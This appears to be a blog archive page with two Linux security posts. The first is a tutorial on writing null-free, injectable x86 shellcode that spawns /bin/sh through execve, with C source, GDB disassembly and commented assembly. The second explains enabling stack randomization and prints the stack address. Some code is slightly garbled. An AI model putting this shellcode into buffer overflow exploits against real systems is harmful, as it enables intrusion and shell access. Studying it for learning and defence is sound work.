Archive for the ‘Linux’ Category

Shellcode : Spawning a Shell

The easiest way to be able to write a shell code is to follow these steps:

1- Write your shellcode in high- level programming language and compile it.

2- Use any debugger you want to disassemble the compiled code (GDB).

3- Try to understand how the code works

4- Try to make the assembly simple and simple again.

5- Use objdump utility to generate opcodes(machine instructions in readable formate).

So, let’s try to begin write our shellcode in c language, the comments i wrote ‘ll be helpful to make life easier.

int main(void){
char *array[2];

array[0] = “/bin/sh”;
array[1] = ”;
* execve syscall takes three arguments:

*  – Pointer to the executable file name
*  – Pointer to array of arguments
*  – Pointer to array of (form key=value)
* */

execve(array[0], array, 0);

return 0;

After we wrote the shellcode in high-level language, compile it, then we should use GDB to disassemble the compiled code to understand what’s going on.

0x080483c4 <main+0>:    push   %ebp
0x080483c5 <main+1>:    mov    %esp,%ebp
0x080483c7 <main+3>:    and    $0xfffffff0,%esp
0x080483ca <main+6>:    sub    $0x20,%esp
0x080483cd <main+9>:    movl   $0x80484c0,0x18(%esp)
0x080483d5 <main+17>:    movl   $0x0,0x1c(%esp)
0x080483dd <main+25>:    mov    0x18(%esp),%eax
0x080483e1 <main+29>:    movl   $0x0,0x8(%esp)
0x080483e9 <main+37>:    lea    0x18(%esp),%edx
0x080483ed <main+41>:    mov    %edx,0x4(%esp)
0x080483f1 <main+45>:    mov    %eax,(%esp)
0x080483f4 <main+48>:    call   0x80482fc <execve@plt>
0x080483f9 <main+53>:    mov    $0x0,%eax
0x080483fe <main+58>:    leave
0x080483ff <main+59>:    ret

I wont explain this output, it’s very easy to understand, so i ‘ll let you try to understand it, but we must know, that if we want to write a flexible shellcode (based on relative addressing not hardcoded one) we should use a register the represent the base register to us (in our shellcode ‘ll be ESI), and then uses offsets from it, so let’s see the scenario ……

This image explains every thing i ‘ll speak shortly (1 image = 1000 words), so let’s take a look at our shellcode that written to be flexible and injectable.

.global _start

jmp MyCall

popl %esi               # ESI points to our target string
xorl %eax, %eax         # EAX filed with Nulls
movb %al, 0x7(%esi)     # Terminates our target string with null
movl %esi, 0x8(%esi)    # Move the address of our target string to argv
movl %eax, 0xc(%esi)    # Move set of nulls to envp

movb $11, %al           # Move syscall’s number 11 to the first 8  bits of EAX
movl %esi, %ebx
leal 0x8(%esi), %ecx
leal 0xc(%esi), %edx
int $0x80

call shellcode
.ascii “/bin/shABBBBCCCC”

as shown in the previous shellcode, i had added comments to to help you to understand the steps we did, but i ‘ll list the steps also:

1- Fill EAX with nulle (by using xorl instruction)

2- Terminate the string “/bin/sh” with null by moving 8 bits of null from EXA to the ‘A’

place holder.

3- Copy the address of the string from ESI to EBX.

4- Copy the value of EAX over ‘BBBB’ place holders.

and so on, so here we seen the basic concepts to write an flexible and injectable (Not contains null values to be able to injected), so i advice you to try and try and write your own shellcodes to be a great shellcoder.

Categories: Linux, security Tags: , , , ,

Enabling stack randomization in linux


One way to make the process of exploiting buffer overflow vulnerabilities harder is to enable stack randomization feature.

In case of disabling stack randomization features, it’s so easy for the hacker to guess the address of the first instruction  in the shell code based on the offset from the beginning of the stack, so that to make the life  harder to the hacker (not good ones) we ‘ll enable this feature as shown below:

sysctl -w kernel.randomize_va_space=2

So, if we write a small c program to return with the address of the top of the stack,

#include <stdio.h>

unsigned long topOfStack(void){
__asm__(“movl %esp, %eax”);

int main(void){
printf(“%x\n”, topOfStack());
return 0;

and then run it more, the result ‘ll be as shown:


and so no.

Categories: Linux, security Tags: , , , ,